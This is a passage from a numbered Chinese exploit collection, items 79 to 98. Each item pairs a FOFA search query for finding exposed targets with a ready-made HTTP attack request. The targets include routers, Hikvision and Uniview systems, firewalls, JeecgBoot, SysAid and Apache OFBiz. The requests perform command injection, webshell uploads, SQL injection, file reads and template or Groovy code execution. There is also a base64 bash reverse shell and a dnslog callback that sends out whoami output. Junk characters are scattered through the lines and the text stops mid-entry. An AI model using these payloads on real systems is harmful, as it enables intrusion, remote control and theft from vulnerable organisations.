2 I8 f" T- o9 L8 X. nGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
$ c3 W. F7 g! vHost: x.x.x.x3 \7 ]1 x1 N. V1 _# `8 [4 h3 A6 Q) E
3 w0 f( l6 c) l
2 w$ M+ D# M; u, G79. BYTEVALUE 百为流控路由器远程命令执行1 |3 b4 J6 l* a
FOFA:BYTEVALUE 智能流控路由器
9 s+ h, v, g0 W- \- \( ]3 U' g, IGET /goform/webRead/open/?path=|id HTTP/1.1) G" d. L/ P5 G/ U8 u$ x/ W
Host:IP* h9 s: Y8 O* I% D6 H2 L4 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.02 D- h" ^+ t+ |- V Z4 c" A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* c+ D: e/ I* ~6 e4 G. wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 M, E, W8 z! J7 [. V
Accept-Encoding: gzip, deflate
6 z6 f3 G7 z9 K+ L8 G: I/ K4 JConnection: close
1 e& Q7 U. }2 R- `1 ]Upgrade-Insecure-Requests: 1
/ T* u7 c$ S7 E1 T. {9 k& v% W) e# b
, m' o8 ~7 Z( N4 h# U80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传5 I. l" d$ M. j" `4 k+ q) G
FOFA:app="速达软件-公司产品"" s( J$ c& B: w$ \- g7 D/ A
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
: x q/ R1 \5 d$ O' M+ Z- jHost: x.x.x.x: G# k @) T# v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 U; y$ s+ w. S0 f4 AContent-Length: 27/ _) a4 F) Z3 G: @( y+ N$ p9 H& R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ a$ [4 m/ }4 r+ @
Accept-Encoding: gzip, deflate
6 Q- I2 U! @* ` [3 |: hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( Z. z8 g4 f; A* y0 Q4 m
Connection: close+ H& h+ J9 m1 ]; R
Content-Type: application/octet-stream- T3 g$ A$ O* [& T: m% W
Upgrade-Insecure-Requests: 1
4 k+ Q1 g" ^- T' S: L
' s. J" s( E2 g" L<% out.print("oessqeonylzaf");%>* E! |, A6 \$ B% G' `
# n" B3 h* C4 F: V8 ^1 ]/ f8 i- J/ d8 |5 b$ ?
GET /xykqmfxpoas.jsp HTTP/1.1
8 Z! c2 {1 s& W UHost: x.x.x.x
0 S! |7 f; T, C0 q R% K AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* I% R5 r" E7 ]3 r. ~
Connection: close
& H$ x. j P/ H5 xAccept-Encoding: gzip* _1 ` g7 {4 }; F
6 b+ M I. q) b/ V
) a4 m& \# e* T6 Q, B81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露& }7 v. M" D1 h
FOFA:app="uniview-视频监控"
4 y' F8 K) W6 J4 b" M8 KGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
3 U) r: @; b* ^2 P4 q5 a! j+ ~Host: x.x.x.x
% k r# Y6 f+ r. M/ d6 m; ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 d7 ^7 s7 [% VConnection: close6 ^* W) ^, f8 C- L' \& d
Accept-Encoding: gzip
0 p0 B. T' i0 x: D3 Y" D3 a% I) |- @* h1 f
8 E& `3 I# W( t- \82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
& D7 q0 P& `4 |FOFA:app="思福迪-LOGBASE"; |9 h/ f1 X" B& ?4 |
POST /bhost/test_qrcode_b HTTP/1.1
! ~" u# o2 L1 VHost: BaseURL
- p, w) ], z) j3 [# OUser-Agent: Go-http-client/1.1: b2 T# L1 @- Y" ~4 v2 M' |
Content-Length: 23
2 G. b6 V$ O) K: {Accept-Encoding: gzip
+ Z5 q7 w3 k; ~3 D9 ^Connection: close
' Q. ^4 F& e' J. L$ h, I+ F/ pContent-Type: application/x-www-form-urlencoded# u6 [6 ]# m8 @4 t" s- | p
Referer: BaseURL8 U5 ~& J2 y: A {$ Q
* m1 X% V7 ?" v0 X% V# ^z1=1&z2="|id;"&z3=bhost
, f# W( b' r' R+ s. R$ P% e2 y9 K# O) q/ ~9 C
; w1 i0 a- ~8 C2 w' H3 n0 \3 x
83. JeecgBoot testConnection 远程命令执行
9 ~# g2 L4 Q: }( `FOFA:title=="JeecgBoot 企业级低代码平台"
: ?' n& n9 ?3 t# `' t) |( V, A
: ]6 m+ p* m) }/ {
5 N1 A4 [! J5 KPOST /jmreport/testConnection HTTP/1.1
. J( M, x8 }- Q- ]' k! [1 K2 THost: x.x.x.x4 F1 T# z$ Z5 |5 r/ F+ b6 g: }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% v$ b4 J# \6 [
Connection: close0 z& {* T3 W9 \: @4 s
Content-Length: 8881) n) d; u" W! I, ~# J: D& v: ]2 y1 B
Accept-Encoding: gzip
. e7 O1 E+ v6 @; _8 UCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"4 r$ c6 S% u" u
Content-Type: application/json' `5 ?0 s0 a8 q: U; j: j( w+ z
# E" t1 i3 l+ |# oPAYLOAD, S% |$ }* ^# F# R! A
+ Y S' H# O$ C: e& _: t
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
# n1 @3 Q0 p% Y5 \# x) h* sFOFA:title=="JeecgBoot 企业级低代码平台"" u0 ?7 C# o1 \) g$ s
! ?' e h5 s& Q! r; g9 l0 p
8 @6 I4 w' Z4 W) o. P4 T" H' {) B- I
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
7 d1 I& e( C- y( i, i/ J5 ^Host: 192.168.40.130:8080+ D& [' a) a- |! U" s6 T
User-Agent: curl/7.88.1
% f5 [$ M1 V1 V% Q U2 s- m4 aContent-Length: 156
# h& M& ^* `! c0 d7 n" t, C3 @) EAccept: */*
( W/ T8 R5 e0 S7 fConnection: close' ?" U" h3 B% d9 `. N: u6 w
Content-Type: application/json+ V: D k) f+ g; i+ F* G
Accept-Encoding: gzip
* c1 ?( v3 F, M L& \
7 @* m7 N. B7 w1 D) u* `{2 H# h6 ?- q6 | W3 h
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",' x4 s0 B& d+ G& t1 B! C
"type": "0"& g, a: @% f# I' J3 z$ O
}! q4 W3 ~/ W, e9 V6 t/ `
) }) D+ d2 q3 a% X
8 _, g1 {6 i9 q; a85. SysAid On-premise< 23.3.36远程代码执行
- ^4 P% z% I+ u% D& VCVE-2023-47246
1 v6 l9 k: G: XFOFA:body="sysaid-logo-dark-green.png" . Q+ y3 q4 A9 y/ Y
EXP数据包如下,注入哥斯拉马
8 K! Y* ^* f3 TPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
. @4 X; Z- f; d* f4 SHost: x.x.x.x' s/ ~ ?5 @- n& N% M$ M* L1 a" ?+ J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 X: m& F6 q% ?6 h9 O, H" `Content-Type: application/octet-stream
9 l6 D2 r. B4 RAccept-Encoding: gzip
# X3 V8 i4 D8 u5 R7 R: a. N' H
$ T9 H" ]/ N4 H2 u) DPAYLOAD U5 b$ Z" g$ E, @
2 q8 o, f) e1 j( w! J回显URL:http://x.x.x.x/userfiles/index.jsp
; m4 P4 h# ]4 C' W; a3 _1 A/ V' R/ A1 r' H) H
86. 日本tosei自助洗衣机RCE
8 D h: e7 `2 GFOFA:body="tosei_login_check.php"
6 o; `) l6 t; o$ P# ?: q- pPOST /cgi-bin/network_test.php HTTP/1.15 L+ | c/ V4 ]& H7 O6 y
Host: x.x.x.x) I' o! u1 @4 e' {
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
3 }; K c: x! X! |$ h LConnection: close8 i b9 ]5 L$ i' M% {$ |6 J
Content-Length: 44
% y, R$ A- p, c# k3 fAccept: */*
* x7 ] T8 r v5 i9 w- }) hAccept-Encoding: gzip: D/ F, c1 i2 S2 G& I
Accept-Language: en0 r; h8 R" w* ~% y$ B
Content-Type: application/x-www-form-urlencoded
" W" G/ ~- G1 \/ `7 T' m y. S5 _% P7 K- c
host=%0acat${IFS}/etc/passwd%0a&command=ping' x( |: w7 Y! Z: V
) ^5 c* h. _ d5 k ^9 l+ x+ I
& b2 O6 J# F5 a6 h87. 安恒明御安全网关aaa_local_web_preview文件上传- q$ O' m1 _4 O4 f7 `
FOFA:title="明御安全网关" C( S. t3 t0 |
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1' Q9 I$ `, M" ]: A
Host: X.X.X.X. f0 P; J! E! n* q O2 i4 |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" B2 W9 q" Q- J1 VConnection: close
4 @( M4 s- b& n# E4 zContent-Length: 198
4 K1 F9 n" W3 u3 {9 v) oAccept-Encoding: gzip' I6 Z+ O8 b" c% ~8 V, D+ o' i4 n
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd7 T( k/ J2 O9 @+ c
9 y6 I, v. l* ]1 u7 ]4 z
--qqobiandqgawlxodfiisporjwravxtvd
8 q) e: p3 ^# v; rContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
% p* F* S Q2 k7 E Q! k1 S: QContent-Type: text/plain4 R O4 T6 ~& S5 P/ M" R
* ^- N, o/ C' Z) q$ y2ZqGNnsjzzU2GBBPyd8AIA7QlDq" K5 F" I1 ]/ }- j4 T+ h
--qqobiandqgawlxodfiisporjwravxtvd--5 ^1 \1 p+ R2 \! j, g, V( e
( S" u8 l) W+ D) C8 ?: Z* X
( z* d3 }! \% N. y4 d/jfhatuwe.php
5 C. [; p9 ]: n. P% G4 L; M9 g! N7 M
# ^# S3 J: e( Q88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行; l; Y; D" V4 f# @3 \9 M$ H
FOFA:title="明御安全网关"
) ~ |$ q. o$ ?" iGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
$ \8 t9 x( e z3 SHost: x.x.x.xx.x.x.x; A9 f* y3 I5 h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 G) L) h% B# p' V' ^9 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. v/ r# P- H. x, f- r: ~0 c9 b
Accept-Encoding: gzip, deflate
1 J$ S8 Q" ?& L: p/ uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 i5 S2 v( i3 i" q0 v; C) ?7 ]Connection: close1 u C: W1 P: n% r2 N6 c
% @6 T% b: Z5 r) u7 M! J8 @8 K
. v9 ]$ S8 E( U! o/astdfkhl.php5 O7 m% Y& `; r) L6 `
6 r8 a, k0 d. L5 Z& R1 z/ i89. 致远互联FE协作办公平台editflow_manager存在sql注入, [+ z1 p9 E: K' }4 A: H
FOFA:title="FE协作办公平台" || body="li_plugins_download"; s0 \4 r7 T0 F+ X' k. M3 B! L
POST /sysform/003/editflow_manager.js%70 HTTP/1.11 m) ^1 {2 R, l* I
Host: x.x.x.x
1 r/ _: |0 o, YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ ]7 w. Q! f) G/ X# u; E
Connection: close7 k! l3 N. f6 o$ F- @9 A
Content-Length: 41
3 A: n- M1 R \% DContent-Type: application/x-www-form-urlencoded
" E- w' O, L- }) v1 [9 ~4 jAccept-Encoding: gzip
* n& p# D0 v) e/ v1 o, s! B- E D; g# W0 H6 B
option=2&GUID=-1'+union+select+111*222--+1 t7 n, y/ i! \5 }
2 Y- C2 L& {4 L- \6 A, Y0 z1 n. x2 ]
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
- v9 N+ A6 i7 [2 z% B- L) UFOFA:icon_hash="-1830859634"1 A8 ^+ l0 D# ]+ \% {
POST /php/ping.php HTTP/1.14 [9 B7 _* U' d6 `* s K; J$ m+ j( Z
Host: x.x.x.x
2 i# H3 z' O+ HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0" a4 h7 |, ~& i: N
Content-Length: 51$ U$ y3 t3 ^, w0 i. R: [2 ~* @" ]
Accept: application/json, text/javascript, */*; q=0.01$ O' \, P! m/ b' ?+ R
Accept-Encoding: gzip, deflate
# S2 g* i# U( \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 C* \* ]/ G; _! r/ S6 C5 v# i0 D
Connection: close' O) |. @0 a$ ^4 q! {, w
Content-Type: application/x-www-form-urlencoded7 P+ n5 A' A1 |* ]' p1 v7 U
X-Requested-With: XMLHttpRequest
: k% g6 f& K& F0 l; X8 y- N% K. s4 E' H" K, z4 f
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
4 u% x6 n* I9 h
! D- g9 T; J$ P& b
$ j, m: G/ h! Q# S/ S8 W- h! p91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
8 y9 o# o1 x$ V/ i& H: s. HFOFA:title="综合安防管理平台"
; s( ^! b$ K7 B) E- ~# ZGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
6 g+ c# L% Y; B9 j/ K0 a9 R# M3 IHost: your-ip' o- ^' Q6 S& N9 s1 c, @: z, J. D! f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.364 C0 E& O9 o6 \3 B, h# T
Accept-Encoding: gzip, deflate
( a( ]' ]" `. \' wAccept: */** ^( J/ V6 o4 Y- p- ^
Connection: keep-alive
: y2 [; b; W$ l4 R* Z( c. `% T! ^$ Y
$ K9 _' ^! T# b: M8 x' U& U8 V* a. G. F2 b; f4 y
- t8 [. T& x% ]92. 海康威视运行管理中心session命令执行0 J) }: }% I/ o% ^, L/ q& F
Fastjson命令执行
6 k6 e& M' |' f) ? ^* a$ ?3 O# ehunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
" M/ [& Q' ^2 E, I" z2 wPOST /center/api/session HTTP/1.13 o6 \5 c2 j* L" i
Host:
, {9 ^4 t/ s+ I# G9 ~* }$ ~2 QAccept: application/json, text/plain, */*- T$ v5 I2 ~0 {2 R8 N d
Accept-Encoding: gzip, deflate! h' b" c2 A( _; s- J
X-Requested-With: XMLHttpRequest; M1 k) q. F4 i7 M" y
Content-Type: application/json;charset=UTF-8
0 u; c7 j4 i4 |! W# L: tX-Language-Type: zh_CN
$ p3 h3 V7 y# ]2 a" dTestcmd: echo test
% g$ N' x/ h/ M* j4 \% RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
: }* S, }( K% a! ]( x/ x9 U" PAccept-Language: zh-CN,zh;q=0.9
9 V6 `6 F) d4 EContent-Length: 57781 M6 P) Q9 H+ C& T5 B% A* Z3 F
: w' I" ?/ @' ]
PAYLOAD
" i/ }) j W2 |7 {) Q2 K, }
+ H9 B0 A& ]7 |! {5 e$ ?/ C o3 R! F
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传% f: R- F% I' ~ G& }- A
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
: \; P5 }: d" Q) z. B2 CPOST /?g=app_av_import_save HTTP/1.14 ~1 i; `3 V4 y+ S
Host: x.x.x.x
9 [7 b0 w; s- ^5 Z6 GContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
+ @4 [5 K n# ~User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ w8 F3 O5 d E8 O1 E; n" e
5 f# i9 M% h, G------WebKitFormBoundarykcbkgdfx L- v T, Q& m" W* r9 }/ z* ~
Content-Disposition: form-data; name="MAX_FILE_SIZE"
' Z0 A1 i; F6 u* K0 w0 u: o9 T) P; ~/ M$ ^+ P/ D; ?
10000000
1 Z0 }# y( a3 g/ p4 x; X------WebKitFormBoundarykcbkgdfx
$ h% ^9 @6 m2 I% J5 o- e- l- Z; _Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
7 {! B7 [+ s$ i0 z5 x. dContent-Type: text/plain
8 M3 }0 T y" {+ O
- j/ b2 j. O9 J/ o+ c, u7 jwagletqrkwrddkthtulxsqrphulnknxa$ W' B6 f7 f3 p( T- P" L
------WebKitFormBoundarykcbkgdfx% ~! O1 n0 ~' W N% A
Content-Disposition: form-data; name="submit_post"
* n& J5 `( l; V i/ \" s# Q) a8 q7 {0 }
obj_app_upfile+ ]$ s0 V: W! }# I8 l" W
------WebKitFormBoundarykcbkgdfx7 z4 i% K& {, V* F$ j1 R
Content-Disposition: form-data; name="__hash__"
/ {: O& T P! E8 J6 ]7 q& H2 T
. q' ?; O: b5 ~* K0b9d6b1ab7479ab69d9f71b05e0e9445
$ r. {& V8 o" ?! y% J2 D------WebKitFormBoundarykcbkgdfx--! |5 F+ D2 L- [2 `8 r
; \! x$ H5 \2 P& G) ]6 W: X, U
& \" `- Z- G: v2 h* a% U( UGET /attachements/xlskxknxa.txt HTTP/1.15 N6 }. z; |6 F x: z) f0 @9 e5 h& j
Host: xx.xx.xx.xx& v @6 r- m/ x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 l6 L- L5 p/ E" I4 ~' C: _0 f. _3 X4 G
+ T/ }1 e$ F( K7 p/ i; I94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传6 U) e3 e4 F' S$ \
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="9 t& k& G( V' V( y) i
POST /?g=obj_area_import_save HTTP/1.1
4 Y# k- R ^3 z+ A: [8 ?4 c: N7 JHost: x.x.x.x2 H8 W% s7 ^: e9 i, v, h
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt" e: r* K( W5 g: \% m7 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.366 w2 e2 D9 o A( d1 _
3 ?. H( H) V2 B+ f------WebKitFormBoundarybqvzqvmt
: `9 W) B! T p! a; C( A4 sContent-Disposition: form-data; name="MAX_FILE_SIZE"; k% z; k- b- F# k: `8 y+ C3 T* k
6 s+ x9 e+ b: y5 v100000006 v! E# [( F Z; e/ \
------WebKitFormBoundarybqvzqvmt$ `& e( C5 _* `3 U7 `
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"6 p( A1 e) e2 w: H4 [& r; _. _
Content-Type: text/plain
" E: N' s) ~ F* D1 P4 \! L7 X1 g" x$ t! R- m9 G" D
pxplitttsrjnyoafavcajwkvhxindhmu
! Y/ y6 }, h: B; d- J, N' N------WebKitFormBoundarybqvzqvmt
5 w6 C( M0 c/ r3 `. O R" JContent-Disposition: form-data; name="submit_post"
; R7 Q( L$ m' u! _0 ?8 [ r/ R' ~9 F* ^8 j9 O9 \; T% O3 o& h
obj_app_upfile6 g! B! ?" j: T
------WebKitFormBoundarybqvzqvmt
8 C( k2 ]. Z3 Z" B# _$ v! p5 ^Content-Disposition: form-data; name="__hash__"
# r% y. i0 X1 f$ e) H7 |- k) b& y7 C# t8 A O; b/ u* m* E, B
0b9d6b1ab7479ab69d9f71b05e0e9445# [3 h) {& a' ~
------WebKitFormBoundarybqvzqvmt--
6 h: C9 A, j5 [9 F" L
; b& X6 x/ T# Y5 c( n
, t( d f7 n+ J; K+ ^% W. }) P8 w0 H
- S6 t" @; Q9 y+ X, s eGET /attachements/xlskxknxa.txt HTTP/1.1
0 K8 N" u& \' kHost: xx.xx.xx.xx( i) |. T t! B: \0 Q" p' s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 _+ V, j: l9 a5 p2 {2 j+ |3 a8 j M7 w$ ?
/ k, @% a0 N( h
% w- @( k: w& l* ~: N95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
- Q+ c- ?. ^5 \& Q; N0 i# ]# dCVE-2023-49070
! I5 A3 F2 V% }' j" i: gFOFA:app="Apache_OFBiz"# o4 }5 U q- Q. p Y- w
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.18 O$ h4 |3 G: G0 A0 E7 P6 F
Host: x.x.x.x& y2 N; }$ {* H B! O5 n3 `
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36* x/ B6 B% G) |# g2 p8 O
Connection: close4 r% X$ G; x0 H4 y" A, w% A
Content-Length: 8896 K2 m$ ~: H4 M7 L- A% o( h
Content-Type: application/xml0 W' B7 e I# A9 J1 r
Accept-Encoding: gzip4 G. J8 r( K1 x0 F
6 j3 Z) j: I5 m5 ~/ D; y<?xml version="1.0"?>) x# g2 D9 _& c7 C/ F: J
<methodCall>
; S9 h1 p8 [1 W' e <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
# J1 w" ?- C1 e; @7 r+ o <params>) i: v' z( z7 O) \9 s! L2 W7 z
<param>+ a, l' D, n6 i5 G
<value>3 ^7 v( q. a' u. }8 a5 T
<struct>5 a7 ?$ e! ]' H3 {
<member>4 w( x1 z7 a8 R# @+ m
<name>test</name># ?' o1 d: T) m F8 H P& L& `6 N
<value>
/ ^; `/ [9 q+ ?$ e$ i+ h7 s <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>7 t3 U$ p9 h4 ]
</value>8 r5 ]- G2 i5 n- T: w$ [
</member>- a, T. r0 W. F, b4 x
</struct>
' w0 @1 ~* ]! L) v0 C- P </value>
& T7 g# n2 W$ Q- Z+ l; ~: l! J </param>/ u0 {) V2 ^# k( @
</params>
( ]; _6 {5 ]4 w% A( p* I3 s, f! k</methodCall>* Y2 e' X* @! B. i
3 V+ c3 \) E2 R' t5 g9 G
! H, \ W7 P4 \: Y: c' Q用ysoserial生成payload1 }: b, A7 i; x& Z+ ~( i4 ~
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"" f( b$ k9 s* {7 B ]
: v8 ~ b) g/ Q
& k9 P$ J- F. W: k% W2 q* L
将生成的payload替换到上面的POC
4 a! k N& S* V" KPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
( p! E, Y' }8 W5 k& O2 R* RHost: 192.168.40.130:8443
! t3 a! J. Q/ d; U* LUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
* y: s* A8 A+ i2 n; [. MConnection: close e2 Z; M. R- k) k$ a- Q
Content-Length: 889
' w2 g5 _: W1 v5 e; | oContent-Type: application/xml
% l, H) j2 g' r: xAccept-Encoding: gzip
- P/ l6 t2 `+ h- r
% }8 l8 s& R2 T4 W- `$ sPAYLOAD; Z1 A- e) g3 E9 y) ^* P3 G; p
+ Y/ s( e6 G1 w' _7 t/ z' q
96. Apache OFBiz 18.12.11 groovy 远程代码执行
* Y3 s( L9 R! A2 uFOFA:app="Apache_OFBiz"% g2 M5 w4 F) V" p
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1* t) C5 s& [+ b3 l" a3 c1 b( t) R
Host: localhost:84437 T$ Z0 v$ z8 A1 J: z4 Q. E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
9 c: x3 v# g/ ^9 uAccept: */*
' P' }2 U7 \* K; m0 u$ b: n' jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 ~ |5 R+ C3 V r+ `
Content-Type: application/x-www-form-urlencoded$ j3 M4 e- q* Z1 |/ D7 X: M
Content-Length: 55
' @3 n7 F/ h) i3 v$ ?+ F" @7 _0 a7 e4 y/ a# N" s6 E
groovyProgram=throw+new+Exception('id'.execute().text);
% Z3 m2 U% i1 Q6 ?4 }, `
* [. ]6 r* ?- {6 _0 c0 o E) F! E& j& m3 k4 F* R
反弹shell
0 T2 q6 T2 k/ m( g: J! A0 b在kali上启动一个监听
3 x& u6 a+ O2 y. A) g- H1 L; Qnc -lvp 7777
2 ]8 M1 Z+ s9 n! v7 n! t, D' e O- ~" L6 Z( A# v
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
% E1 R1 e( V5 V( ^! v- tHost: 192.168.40.130:84432 K9 z# ]. }" M$ L. V o9 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0& N. F" g; @. _4 C
Accept: */*
' p# L, m0 r6 t2 v3 R4 FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* E: U3 v+ V! b0 ~
Content-Type: application/x-www-form-urlencoded& G6 d' n3 ?& v+ ~! }
Content-Length: 71
|. _9 L8 J, y; S' y' Y5 @5 q; m2 I
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();' Y' J& N8 ]6 x" Y+ M4 t- y' \$ g
6 `1 E( _" C3 Z0 k1 G4 Q
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
) H9 Z& ^, l3 r1 D. A/ d* ^7 FFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"3 X: l; Y1 |0 B
GET /passport/login/ HTTP/1.17 t- F$ p- }) N3 U# ~% N
Host: 192.168.40.130:8085
/ i3 \+ a3 d5 Q& x& b p: GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 ]9 @% d7 M, H5 `5 T; e0 c* L
Accept-Encoding: gzip
5 a. I+ ~2 G' R# GConnection: close
( T' A; m% o* g s! J9 Q( }Cookie: rememberMe=PAYLOAD
% k) d# O( X J) V2 M" I! lX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"+ J0 p* A/ @/ s& V& _; B
0 ] C! V# _/ Y, O) H/ b
9 j* l; X! m0 D+ {2 a98. SpiderFlow爬虫平台远程命令执行
7 O) p, o- a6 v: R' PCVE-2024-0195% P0 m3 q9 M" U/ Y6 k- K
FOFA:app="SpiderFlow"
- ~& A2 m9 M" \8 n0 Z# VPOST /function/save HTTP/1.1+ ^3 G: U4 S9 w! K) G6 p+ K
Host: 192.168.40.130:8088- |9 v7 k6 }/ D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0% B) R9 k! k# m$ h8 G$ s$ f
Connection: close+ l1 S8 i! C1 r6 n/ T
Content-Length: 1212 L& |# R) u9 }9 V8 F
Accept: */*
9 ^# r, |! n: \5 zAccept-Encoding: gzip, deflate
- j" g2 r( G+ b# r. N6 R6 zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 \9 F7 L( p$ ~' H( f! }# s
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
; m3 j$ W+ x( J" s* B7 FX-Requested-With: XMLHttpRequest9 P5 l2 j: T7 ~* p% F2 Z; u& {
+ c; m9 O: I o; R/ N3 w3 ~
